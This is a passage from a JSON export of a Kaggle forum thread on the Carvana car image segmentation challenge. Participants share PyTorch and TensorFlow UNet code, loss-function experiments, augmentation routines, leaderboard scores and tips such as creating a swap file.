          "author_url": "",
          "post_date": "08/10/2017 07:39:50",
          "content": "<p>Did you set the 'CUDA_VISIBLE_DEVICES' Variable? </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 213506,
          "author_name": "strideradu",
          "author_url": "",
          "post_date": "08/14/2017 23:38:49",
          "content": "<p>I didn't change that, I suppose to have 1 K80 GPU available</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 212248,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/11/2017 03:43:06",
      "content": "<p>another pytorch segmentation open source:</p>\n\n<p><a href=\"https://github.com/ycszen/pytorch-ss\">https://github.com/ycszen/pytorch-ss</a></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 212369,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/11/2017 13:35:06",
      "content": "<p>experiments for weighing pixels at the boundary. see attachment pictures.</p>\n\n<p>without  weighing:  </p>\n\n<p>train=0.9934, validate=0.9940, LB=0.991</p>\n\n<p>with weighing:  </p>\n\n<p>train=0.9942, validate=0.9945, LB=0.991</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/212369/7044/weighted_dice_1.png\" alt=\"enter image description here\" title=\"\">\n  <img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/212369/7045/weighted_dice_2.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 215665,
          "author_name": "depthfirstsearch",
          "author_url": "",
          "post_date": "08/22/2017 15:16:23",
          "content": "<p>I'm wondering if your weighted dice loss only weights the positive class. Because <code>intersection = m1 * m2</code>, the intersection will be equal to zero wherever the mask (= true label) is zero. Hence, you end up doing <code>w2 * 0</code> for the negative class. In my mind you're ignoring the weighting of the negative class here.</p>\n\n<p>Please tell me if I'm missing something.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 216500,
          "author_name": "lyakaap",
          "author_url": "",
          "post_date": "08/26/2017 03:03:00",
          "content": "<p>I implemented your weighted_bce_loss and tested it, but the returned negative large number. (e.g. dice_score : around 0.98, weighted_bce_loss : -600~)</p>\n\n<p>Is it OK?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 216548,
          "author_name": "malcolmsun",
          "author_url": "",
          "post_date": "08/26/2017 15:07:53",
          "content": "<p>Hi @Heng, thanks for your sharing. I got useful knowledge from them. Since I am a new CVer,  I am not familiar with CV algorithms. I used dilation to determine which pixel to be weighed. Is it feasible? Looking forward to your reply.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 216554,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/26/2017 16:10:52",
          "content": "<p>@lyakaap</p>\n\n<p>loss can not be negative.  I am not sure why this error happens at your side.</p>\n\n<p>.</p>\n\n<p>@malcolm</p>\n\n<p>i think it is ok. just do experiments with and without weighing and the results will show if it works.</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 216639,
          "author_name": "lyakaap",
          "author_url": "",
          "post_date": "08/27/2017 04:42:30",
          "content": "<p>I also thought it's incorrect that loss would be negative, but contrast  intuition, still it worked properly.\nOn the contrary, I tried to flip the sign of function output. The result is poor and obviously incorrect.</p>\n\n<p>Thank you for answering. I will review my implementation and recalculate bce_loss formula.</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 212412,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/11/2017 15:40:47",
      "content": "<p>data augmentation</p>\n\n<p><a href=\"http://ee.sharif.edu/~shayan_f/fgcc/index.html\">http://ee.sharif.edu/~shayan_f/fgcc/index.html</a></p>\n\n<p><img src=\"http://ee.sharif.edu/~shayan_f/fgcc/imgs/color1.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": [
        {
          "id": 212703,
          "author_name": "petrosgk",
          "author_url": "",
          "post_date": "08/12/2017 12:32:45",
          "content": "<p>I'm testing a Hue/Saturation/Value augmentation. Looks promising so far, will update with results soon hopefully. My concern is that most cars in train/test sets are black, white or shade of gray and the hue/saturation adjustments don't have much of an effect there.</p>\n\n<p><img src=\"https://image.prntscr.com/image/R2F_OexrROmTMgUloNmeGQ.png\" alt=\"enter image description here\" title=\"\"></p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 213705,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/15/2017 04:56:04",
          "content": "<p>you hue augmentation looks good. do you have a code for that?</p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 213713,
          "author_name": "petrosgk",
          "author_url": "",
          "post_date": "08/15/2017 05:17:07",
          "content": "<pre><code>def randomHueSaturationValue(image, hue_shift_limit=(-180, 180),\n                             sat_shift_limit=(-255, 255),\n                             val_shift_limit=(-255, 255), u=0.5):\n    if np.random.random() &lt; u:\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n        h, s, v = cv2.split(image)\n        hue_shift = np.random.uniform(hue_shift_limit[0], hue_shift_limit[1])\n        h = cv2.add(h, hue_shift)\n        sat_shift = np.random.uniform(sat_shift_limit[0], sat_shift_limit[1])\n        s = cv2.add(s, sat_shift)\n        val_shift = np.random.uniform(val_shift_limit[0], val_shift_limit[1])\n        v = cv2.add(v, val_shift)\n        image = cv2.merge((h, s, v))\n        image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)\n\n    return image\n\nimg = randomHueSaturationValue(img,\n                               hue_shift_limit=(-50, 50),\n                               sat_shift_limit=(-5, 5),\n                               val_shift_limit=(-15, 15))\n</code></pre>",
          "votes": null,
          "replies": []
        },
        {
          "id": 213727,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/15/2017 05:54:35",
          "content": "<p>thanks!</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 212895,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/13/2017 01:36:17",
      "content": "<p>smart post precocessing!\nThe car is symmetrical. this can be use to correct segmentation error. e.g. in a frontal car, if missing segementation occurs at one side, it can be easily detected. some reasoning goes for car turned at 30 degree left and right.</p>\n\n<p>better still, try a deep CNN to detect and correct such error, or incorperate such symmtrical information in the network</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 213279,
      "author_name": "stijndecubber",
      "author_url": "",
      "post_date": "08/14/2017 09:53:00",
      "content": "<p>I trained a model on 1024x1024 images, with batch size 1. I'm getting these crazy artifacts in some images, resulting in a lower than expected LB score. I'm not sure if this could be related to the small batch size. Or should I be looking for errors in my upscaling methods? Did anyone encounter similar artifacts? For most images, the predictions are fine, so that the public LB score is 0.965. </p>\n\n<p><img src=\"https://i.imgur.com/hH3AW8K.png\" alt=\"example\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 213331,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/14/2017 14:14:35",
      "content": "<p>TTA (test time augmentation) on validation set. CNN model is 1024x1024 input</p>\n\n<p>if performed on the test set (100064 images), each augmentation is going to take 2 hr. Hence the cost is roughly 12 hr for 0.000035 gain in LB!</p>\n\n<p><img src=\"https://storage.googleapis.com/kaggle-forum-message-attachments/213331/7089/augment.png\" alt=\"enter image description here\" title=\"\"></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 215233,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "08/20/2017 16:37:09",
      "content": "<p>code for merging removing BN in inference, by merging into CONV.\nI have verify that conv-bn-relu preduced the same results as merged_conv-relu. It is about 10% faster.</p>\n\n<p>In addition, fp16 works and produce same results (about 0.00001 numerical error difference). It can increase inference batch size by about 40%.</p>\n\n<p>In pytorch you just have to use:</p>\n\n<p>net.cuda().half()</p>\n\n<p>Variable(images,volatile=True).cuda().half()</p>\n\n<pre><code>  class ConvBnRelu2d(nn.Module):\n      def __init__(self, in_channels, out_channels, kernel_size=3, padding=1, dilation=1, stride=1, groups=1, is_bn=True, is_relu=True):\n          super(ConvBnRelu2d, self).__init__()\n          self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, padding=padding, stride=stride, dilation=dilation, groups=groups, bias=False)\n          self.bn   = nn.BatchNorm2d(out_channels, eps=BN_EPS)\n          self.relu = nn.ReLU(inplace=True)\n          if is_bn   is False: self.bn  =None\n          if is_relu is False: self.relu=None\n\n\n      def forward(self,x):\n          x = self.conv(x)\n          if self.bn   is not None: x = self.bn(x)\n          if self.relu is not None: x = self.relu(x)\n          return x\n\n\n      def merge_bn(self):\n          assert(self.conv.bias==None)\n          conv_weight     = self.conv.weight.data\n          bn_weight       = self.bn.weight.data\n          bn_bias         = self.bn.bias.data\n          bn_running_mean = self.bn.running_mean\n          bn_running_var  = self.bn.running_var\n          bn_eps          = self.bn.eps\n\n          #https://github.com/sanghoon/pva-faster-rcnn/issues/5\n          #https://github.com/sanghoon/pva-faster-rcnn/commit/39570aab8c6513f0e76e5ab5dba8dfbf63e9c68c\n\n          N,C,KH,KW = conv_weight.size()\n          std = 1/(torch.sqrt(bn_running_var+bn_eps))\n          std_bn_weight =(std*bn_weight).repeat(C*KH*KW,1).t().contiguous().view(N,C,KH,KW )\n          conv_weight_hat = std_bn_weight*conv_weight\n          conv_bias_hat   = (bn_bias - bn_weight*std*bn_running_mean)\n\n          self.bn   = None\n          self.conv = nn.Conv2d(in_channels=self.conv.in_channels, out_channels=self.conv.out_channels, kernel_size=self.conv.kernel_size,\n                                padding=self.conv.padding, stride=self.conv.stride, dilation=self.conv.dilation, groups=self.conv.groups,\n                                bias=True)\n          self.conv.weight.data = conv_weight_hat #fill in\n          self.conv.bias.data   = conv_bias_hat\n</code></pre>",
      "votes": null,
      "replies": []
    },
    {
      "id": 216022,
      "author_name": "lyakaap",
      "author_url": "",
      "post_date": "08/24/2017 02:07:32",
      "content": "<p>Thank you for sharing! It helps me a lot.</p>\n\n<p>Have you  tried PSPNet in your code? I want to know how the model performs in the carvana dataset.</p>",
      "votes": null,
      "replies": [
        {
          "id": 216075,
          "author_name": "heyt0ny",
          "author_url": "",
          "post_date": "08/24/2017 07:53:15",
          "content": "<p>I've tried pspnet - it was performing really bad.. </p>",
          "votes": null,
          "replies": []
        },
        {
          "id": 216158,
          "author_name": "lyakaap",
          "author_url": "",
          "post_date": "08/24/2017 15:14:17",
          "content": "<p>Sad... I intended to try ensemble PSPNet with other model...</p>\n\n<p>I appreciate hearing that :)</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 216381,
      "author_name": "cjansen",
      "author_url": "",
      "post_date": "08/25/2017 14:09:27",
      "content": "<p>@Heng, what IDE do you use?</p>",
      "votes": null,
      "replies": [
        {
          "id": 216382,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "08/25/2017 14:10:23",
          "content": "<p>pycharm</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 216783,
      "author_name": "pipipopo",
      "author_url": "",
      "post_date": "08/28/2017 05:17:27",
      "content": "",
      "votes": null,
      "replies": []
    },
    {
      "id": 218192,
      "author_name": "asanakoev",
      "author_url": "",
      "post_date": "09/02/2017 21:07:51",
      "content": "<p>@Heng, which image input size did you use ?</p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 218603,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "09/05/2017 05:15:28",
      "content": "<p>some pytorch addon:</p>\n\n<ul>\n<li><p>dense-CRF: <a href=\"https://github.com/milesial/Pytorch-UNet\">https://github.com/milesial/Pytorch-UNet</a></p></li>\n<li><p>ReduceLROnPlateau:  <a href=\"https://github.com/EKami/carvana-challenge\">https://github.com/EKami/carvana-challenge</a></p></li>\n<li><p>inception/densenet block in unet: <a href=\"https://github.com/Hsuxu/carvana-pytorch-uNet\">https://github.com/Hsuxu/carvana-pytorch-uNet</a></p></li>\n</ul>\n\n<p>for more see: <a href=\"https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=\">https://github.com/search?utf8=%E2%9C%93&amp;q=carvana&amp;type=</a></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 221167,
      "author_name": "hengck23",
      "author_url": "",
      "post_date": "09/14/2017 11:18:49",
      "content": "<p>Example of dilated Unet</p>\n\n<p><a href=\"https://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730\">https://blog.insightdatascience.com/heart-disease-diagnosis-with-deep-learning-c2d92c27e730</a></p>",
      "votes": null,
      "replies": [
        {
          "id": 221385,
          "author_name": "zhangsongwei",
          "author_url": "",
          "post_date": "09/15/2017 03:22:29",
          "content": "<p>It seemed that the dilated convolution layer lower the loss of feature information comparing to downsampling/unsampling layer. But it requires more parameters, so we have to reduce the input size or the depth of the net to adapt to our memory. Did it count?</p>",
          "votes": null,
          "replies": []
        }
      ]
    },
    {
      "id": 221201,
      "author_name": "solomonk",
      "author_url": "",
      "post_date": "09/14/2017 13:38:25",
      "content": "<p>Great thread, I am also using PyTorch, Just uploaded my tutorial here:\n<a href=\"https://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification\">https://www.kaggle.com/solomonk/pytorch-numer-ai-deep-binary-classification</a></p>",
      "votes": null,
      "replies": []
    },
    {
      "id": 222606,
      "author_name": "craymond",
      "author_url": "",
      "post_date": "09/19/2017 11:54:03",
      "content": "<p>what is split_file? thanks</p>\n\n<p>P.S. is going through all py to find how to generate it, thx a lot if you can give hint.</p>",
      "votes": null,
      "replies": [
        {
          "id": 222649,
          "author_name": "hengck23",
          "author_url": "",
          "post_date": "09/19/2017 15:33:51",
          "content": "<p>list of training/validation images. i think you can find it in one of the version 07-30. But my software changes. it would be easier for you to read the code and check the format of the file for later versions.</p>",
          "votes": null,
          "replies": []
        }
      ]
    }
  ],
  "raw_markdown_by_id": {
    "208218": "you can download my pytorch implementation at:\n\nhttps://drive.google.com/open?id=0B_DICebvRE-kN21SaDhMZWt5U0U\n\nIt uses a customized uNet. Please refer to the readme.ppt in the link above for setup and details. Have fun!\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208218/6916/starter-kit.png\n\n--------------------------------------------------------------\nsoftware version update:\n\n08-25\n\n- reference software for:\n\n   LB = 0.997 for UNet1024 model in my_unet_baseline.py\n\n   LB = 0.991 for UNet128  model in my_unet_baseline.py\n\n training logs are provided. see also https://www.kaggle.com/c/carvana-image-masking-challenge/discussion/38125\n\n- implement accumulated gradients\n\n- implement weighted boundary loss\n\n- implement merge bn into conv for faster inference\n\n  the version is *not* backward compatible with previous version.\n\n\n\n\n08-02\n\n- add UNet_double_1024_5, which use 512x512 as input and predict 1024x1024 mask.\n\n  UNet_double_1024_5 obtains LB score of 0.996.\n\n  note that many changes are made to support label and image of different size.\n\n  some unused functions are broken because of this.\n\n  the version is *not* backward compatible with previous version.\n  \n\n\n07-31\n\n- add models unet{128,256,512}_{1,2,3} \n\n  unet512_2 obtains LB score of 0.995. \n\n  The training loss curves are included for reference.\n\n\n\n07-30\n\n- support for validation at training\n\n- add dice loss for back propagation\n\n\n07-29a\n\n- fix minor bugs\n\n- add data agumentation in training\n\n- add visualisation for predictions on train sample during training\n\n07-29\n\n-  initial version",
    "208226": "Thank you so much.",
    "208227": "Have you taken a look at \n\nhttps://github.com/mzaradzki/neuralnets/tree/master/vgg_segmentation_keras\nhttps://aboveintelligent.com/face-recognition-with-keras-and-opencv-2baf2a83b799\nhttp://www.vlfeat.org/matconvnet/pretrained/#semantic-segmentation\nhttps://github.com/nicolov/segmentation_keras\n\nand particularly https://github.com/jocicmarko/ultrasound-nerve-segmentation?\n\nHeng, can't thank you enough for your activity on Kaggle. I've learned a bunch from you. Hope you win this one!",
    "208231": "Thanks for your sharing,and can I ask how much time do you cost when you generate a submit or predict? I'm also using pytorch and I generate a predict in the test set may cost 2~3 hours,it is too slow.",
    "208235": "you can check this post:\nhttps://www.kaggle.com/c/carvana-image-masking-challenge/discussion/37203\n\nIt takes about 20 min to predict the masks using CNN, an another 20 min the make csv file.",
    "208247": "Oh,Thanks,that's very  effective~~",
    "208326": "what does 0.988, 0.990, 0.992, 0.996 look like? I upload some files for your reference.\nThese are train errors i got on my train images.\n\nFrom these images, the errors are can be corrected if you know something about the car model (e.g. the bumper is black and has to careful not to confuse with shadow). Dimension of the car might help.\n\nmaybe this is how meta data can be used.",
    "208447": "Hi Heng CherKeng! \n\nYou're involvement in the public forums is simply awesome! I love how you share a LOT of comp. vision type models (particularly in PyTorch)! \n\nI was wondering whether you can post your implementation on Github, so that we can view the code online... \n\nGreat work, keep it up ;) In fact, I'm actually planning to learn PyTorch via this competition, starting from your code. Good luck! ;))",
    "208448": "Increasing Image Size helps, currently using 256 x256 with Keras U-net. \n\n128 x 128 -&gt; 98.5\n\n256 x 256 -&gt; 99.1",
    "208479": "Thanks Heng for sharing. I am hoping to reproduce this with Keras as I don't have PyTorch.\n\nHow long was the training time?  \nWhat was the batch size?",
    "208490": "thanks for the information! it helps",
    "208492": "some segmentation model for pytorch which you can used: \n\nhttps://github.com/bodokaiser/piwise\n\nhttps://github.com/meetshah1995/pytorch-semseg\n\nsome discussion\n\nhttps://discuss.pytorch.org/t/semantic-segmentation-perform-bad/1892/6\n\nyou may want to try these. i think their implementations may be better than mine.",
    "208494": "be careful of those imagenet models. the py files are modified (the naming of the layers had changed) and may not work if you pretrained downloaed from the pytorch repository. you may wan to use the original imagenet py model from the pytorch repository.\n\ni will post the modiifed pretrained models later",
    "208521": "It was very generous of you to share your work. Your work is fantastic. I  just wonder if you have already look at CRF-RNN https://github.com/torrvision/crfasrnn which might be more promising?",
    "208595": "If you are training your model with 128x128 size pictures, then how will you predict the test images with size 1918x1280 since the model expects a tensor of (None, 128, 128, 3)?",
    "208597": "e.g. the predicted mask is 128 x 128 and now you resize the image up to 1918x1280. \n\nDepending on the resize function you can loose information, so training on bigger images should in general yield better results.",
    "208598": "resize image and ground truth mask to NxN at train. predict NxN mask at test. then upscale NxN to  1918x1280 . Not the best solution, but it is a start",
    "208639": "Works fine with 480*720 patches ^_^",
    "208640": "thanks for the infor!",
    "208645": "which batch size do you train?",
    "208647": "some early experiment results\n\n ![enter image description here][1]\n\n ![enter image description here][2]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208647/6946/exp.png\n  [2]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208647/6951/exp2.png",
    "208648": "batch_size = 4 with Adam optimizer, trained overnight with 50 epochs, lr divided by 10 on 10, 20 and 50 epoch.",
    "208649": "thxs will test ur image size this night :D",
    "208652": "note that the prediction size can be bigger than input size. it is like super resolution.\n\ne.g. prediction_mask (input_128x128) = mask_256x256\n\nchange bilinear upsampling layer to learnable deconvolution layer (aka transpose convolution)\n\n...\n\nalso, you can start to modify your unet to be like:\n\ninput_NxN --&gt; [ resnet ] --&gt; resNet_features_FxF --&gt; [uNet] --&gt; mask_KxK",
    "208672": "Another way could be to split images into smaller patches without downscaling. For example, we could split 1920*1280 into 720*480 patches with small overlap and that way it will be possible to train network with full resolution images",
    "208674": "Managed to run it with 1088x720 and batch 2. Still 3.2x downsampling.",
    "208676": "&gt;&gt;Another way could be to split images into smaller patches\n\ni have about the same idea. Please see attachment picture.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208677/6950/high.png",
    "208677": "&lt;",
    "208678": "here is another idea. \n\nSay if we we are given 100x100 mask as ground truth. During training, we upsize the ground truth to 200x200 and train a network to predict 200x200. Then we download size 200x200 to 100x100 as final prediction results. This may has the 'effect' of averaging neighboring pixel predictions to predict current pixel.",
    "208681": "Don't know, seems too complex to me. Advantage of end-to-end Unet is that it could have both local and global information (i.e. it can predict where the car is and also detect very precise boundary using this information). If we select very small patches near boundary there will be less context information (it is very hard to understand what is in small patch -- is it boundary of a car or boundary of letter in the background and so on)",
    "208682": "the patches can be big. e.g 25% of original image size.\n\nresults of low resolution prediction (and maybe location of patch encoded as pixel information e.g. via distance transform) can be added as input to the high resolution network as well.",
    "208703": "new experiment results. surprised that 128x128 can achieve LB 0.989. Unet_1 = my initial design unet.  Unet_2 = design from Keras reference. Tips:\n\n - train your CNN long enough\n - design your unet properly ... try different number of filters\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208703/6952/exp3.png",
    "208708": "Awesome results! How about using 192*128 -- it will be the same proportions as original image. Also, I'd suggest using cv2.INTERP_AREA instead of default. It will make downsampled images more \"smooth\" without aliasing effects. I think it will allow to break into 0.99+ area.",
    "208722": "I have a question about difference between LB score and validation score.\nI have trained model on 256x256 images. I get validation Dice Error ~0.991.\n\nBut when I resize prediction to full resolution, at validation  set I get 0.986 (which is consistent with my LB score).\nI'm thinking if such big drop is sth natural or  I screwed the up-sampling part for prediction (I just use resize and threshold to have only binary values). After my analyse, look like my model learned nice the down-sampled masks, but also with all down-sample artifacts. Or I have sth wrong in my pipeline,\nHow does you pipeline look like?",
    "208732": "This is fine. Your model learns downsampled masks very carefully but they are still downsampled and don't contain all the information of full-sized masks no matter how you will upsample predictions. I got higher score by using 720*480 masks. Currently training 1088x720 ^_^",
    "208771": "Does DA useful ? I'm trying to use rot and flip,but the result become more worse.",
    "208774": "Rotated image is far from val/test image, so I guess it is not a good way. I haven't tried but horizontal flip, horizonal/vertical pixel shift and brightness/contrast change should be good..",
    "208775": "I got 0.993 with 320x480 (1/4 scale) with Keras U-net\nI can see 1 to 4 pixel discrepancy around car boundary as expected. \n\nI also attempt the full-scale image, but it seems to be worse at least for first a few epoch - may be I need more U-net depth, but it becomes too slow to run.",
    "208779": "I think using DA will add some noise.It can improve the robust of the model sometimes,but in this competition we can get 0.99+ precision,so maybe the noise is harmful.",
    "208795": "i am now preparing the experiment write up and code for next release for 0.995 results. Here is a quick summary of my new experiments:\n\n 1.  using bilinear upsampling is better than deconvolution layer in unet (which i don't know why ... i suspect overfitting)\n\n 2. different sizes on LB: 128x128=0.989(batch=32), 256x256=0.992(30), 512x512=0.995(16)\n\n 3. augmentation. I use scale+shift. adding non-uniform scaling (change of aspect) worsen the results a little.\n\nit seems that everyone now knows how to move towards 0.999. the battle now is who has the most gpu resources. imagine if i can train in full resolution with multi-gpus!\n\n## note: the results are non conclusive. it is possible that you get different results. my results are only for reference. for details of experiments, please wait for my next post.\n\nUpdated! The reason that deconvolution filter didn't work well could be becuase i forget to initialise them with bilinear weights. I will check that later.",
    "208798": "different resizing (bilinear, cubic, area, learnable) will be my next experiments. Also I will be trying scling without changing the aspect of the original image. I will report results later. Thanks for the hints and  advice!",
    "208824": "Hey , Can you provide the Keras version of Unet.\nThanks in advance",
    "208834": "the bigger size,the higher LB.",
    "208839": "inspired by @ironbar post: https://www.kaggle.com/ironbar/getting-a-meaning-of-the-score, i try to find the limits of using training labels of different sizes. Conclusion is that \"size does matters\" !\n\nHere are the results:\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208839/6954/size.png",
    "208843": "updated. use this with code release '07-31'\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208843/6955/exp4.png",
    "208849": "comparing 128,256,512 unet. It seems that 32 epoch is not optimum. Also there is no overfitting. Then green mask is example of prediction on test image. \n\n  ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208849/6956/exp5.png",
    "208850": "You might also find this useful: https://github.com/mrgloom/awesome-semantic-segmentation\n\nIt contains links to all the papers and implementations (not only in pytorch) of segmentation networks.",
    "208852": "you can check the post below",
    "208854": "thank you for the link, in particular,  \"jocicmarko/ultrasound-nerve-segmentation\" unet structure helps!",
    "208855": "Next experiment plans:\n\nbaseline system:  using as 256x256 input and predict 256x256.\n\ncomparsion system:\n\n     1. Given 256x256 images, crop 128x128 for training and predict 128x128.  During testing, 256x256 is divided into overlapping 128x128  patches to do inference. The results are then combined. \n\n     2. Given 128x128 as input. Train to predict 256x256\n\n     3. Given 128x128 as input. Train to predict 512x512. During testing, 512x512 prediction is downsized to 256x256.",
    "208856": "a possible solution?",
    "208869": "Hello Heng, \n\nDo you think resize image's extension will affect the score?  \nIs it better to resize and write as jpg format than png ?",
    "208877": "it is a new record!  LB score =0.990 for 128x128. The results of using Bce loss + dice loss, i.e. dual loss back propagated. The training iterations are reduced also.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/208877/6962/bce_dice.png",
    "208886": "Bartek\n\nlet ( downsize(x), downsize(y_hat) ) be an train sample, and  p be output prediction of CNN. \n\nDid you threshold(upsize(threshold(p))) or threshold(upsize(p)) for submission? I use threshold(upsize(p)) but i haven't compare which is better",
    "208890": "I am using this competition to improve my skills in keras. I see the model shared in this thread has been written using pytorch. Is anyone using keras/tensorflow to write an equivalent model?",
    "208891": "When using bigger images, how do you guys save the predictions? Currently i'm using numpy array but with bigger image size my 32gb ram gets memory error.",
    "208910": "my ram is 128 gb. Your prediction comes from CNN, which you can save at every e.g. 1000 iterations. your results will be in chunks of 1000. 512x512 prediction mask (float32) is about 104 GB when saves as npy file.",
    "208912": "Eugene  I am not sure but i think image compression should have negligible effects",
    "208914": "You could virtually increase your memory size by using a swap file:\n\n\n    #!/bin/bash\n    # swap-create: creates 20 GB swap file\n    \n    SWAP_FILE=${HOME}/swapfile\n    \n    sudo dd if=/dev/zero of=${SWAP_FILE} bs=512M count=40\n    sudo mkswap ${SWAP_FILE}\n    sudo chmod 600 ${SWAP_FILE}\n    sudo swapon ${SWAP_FILE}",
    "208927": "yet another simple idea is to use initial low resolution mask prediction to get a bounding box of the car. They crop and resize the bounding box (with border) to some good size like 512x512. This reduces the the background and maximizes the object in the 512x512 input.",
    "208933": "I have checked last @Heng CherKeng script and it really produce 0.995 score using 512 images, thanks! Now I'm ready to find a bug in my code:)\n\nAbout memory consumption when predicting I resolved it by using uint8 format instead of float32\nSo I get prediction after sigmoid function, multiply them by 255. and convert to uint8.\nAfter resizing I threshold them by 128. \nThen I use ~30GB of memory for making a prediction (having 32GB). Saved all mask for 100k images takes 25 GB (so 4x less than float32). As I have same score at LB like Heng, look like it does not hurt performance \n\n\nAbout cropping the removing the background from images, I think that is very good idea, which I was thinking about too.\nThe simple two-step idea is best. And it provide bigger car images at same resolution of input image. But I would have left some background around the car to enable random crop and have more information about background around car.",
    "208979": "You could save the numpy array in bcolz format. It's one of the fastest and a cheap way of saving numpy arrays on disk. Some utility functions to save and load bcolz arrays are here: https://github.com/fastai/courses/blob/master/deeplearning1/nbs/utils.py#L175-L181",
    "209100": "jackkwok : Will you share the code once you are done with converting this to keras",
    "209122": "yet another idea",
    "209157": "You are kind of sharing your code. I trained a UNet, but it marks all edges just as the attenchment. How do you remove the logo of \"carvana\"?",
    "209167": "Verify the training, your model is not creating a mask around the car.   \nProbably it doesn't have learn anything.",
    "209187": "I'm also using adam, I'm wondering how you set the initial super parameters?",
    "209188": "I'm working on tensorflow version",
    "209193": "Do you know what is causing the spots in the wheels? Is it the training data?\n\nI have only noticed one image where the manually created mask trimmed in between the wheel's spokes, but I haven't reviewed enough images to know if it is a common or rare issue.",
    "209205": "ironbar The code is as follows, just trained a unet. I don't know whether the model construct method is OK. It seems that the model just find all the edges, and do not create a car mask.\n\n<pre><code>\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tf_unet import unet, image_util, util\n\nbase_dir = \"/home/xrq/prog/kaggle/image_masking\"\noutput_path = base_dir + \"/script/tmp\"\nmodel_path = base_dir + '/script/model'\ntest_pic_path = base_dir + \"/script/00087a6bd4dc_01_predict.jpg\"\n\ndata_provider = image_util.ImageDataProvider(base_dir + \"/dataset/train/*\", data_suffix='.jpg', mask_suffix='_mask.gif')\nnet = unet.Unet(channels=3, n_class=2, cost='cross_entropy', layers=3, features_root=1)\ntrainer = unet.Trainer(net, batch_size=1, optimizer='momentum')\ntrainer.train(data_provider, output_path, training_iters=10, epochs=100, dropout=0.5, display_step=1, restore=False, write_graph=False)\n\ninit = tf.global_variables_initializer()\nwith tf.Session() as sess:\n    # Initialize variables\n    sess.run(init)\n\n    net.save(sess, model_path)\n    pic = np.array(Image.open(base_dir + '/dataset/train/00087a6bd4dc_01.jpg'), np.float32)\n    prediction = net.predict(model_path, np.reshape(pic, (1, 1280, 1918, 3)))\n    \n    res = np.reshape(prediction, (1240, 1876, 2))[:, :, 1]\n    img = Image.fromarray(res * 255)\n    if img.mode != 'RGB':\n        img = img.convert('RGB')\n    img.save(test_pic_path)\n    img.show()\n</code></pre>",
    "209231": "segmentation tricks!\n\nsee pascal voc 2012 leader board method description\n\nhttp://host.robots.ox.ac.uk:8080/leaderboard/displaylb.php?challengeid=11&amp;compid=6\n\ne.g   CRF is applied as post-processing step.\n\nWe also use densecrf as post-processing to refine object boundaries.",
    "209393": "finally a solution for 0.996. please refer to for code release 08-02 and experiment. Here is a summary for unet for predicting 1024x1024 (batch size=8).\n\n1. construct a 512x512 input unet\n\n2. the last feature map is 512x512\n\n3. concat this last feature with input. upsize to 1024x1024.\n\n4. add conv filters 3x3, bn, relu, etc ...\n\n5. finally, a classifier layer to predict results at 1024x1024\n\n\nNote that there is numerical instability. I am not sure if it is due to unstable bce loss or BN layers (too little train samples can cause running std =0?). I will find out if I have time.\n\n ![enter image description here][1]\n\n\n  [1]: https://kaggle2.blob.core.windows.net/forum-message-attachments/209393/6970/1024.png",
    "209397": "yet another idea is to use distance transform to weigh the boundary pixels in the loss function.",
    "209438": "e..,maybe input is 512x512 and you write 512 x 125? I was using 512x512 input size, 512x512 output size ,no bn layers (i have no more memory,and I think we don't need it.),it can also get 0.996.",
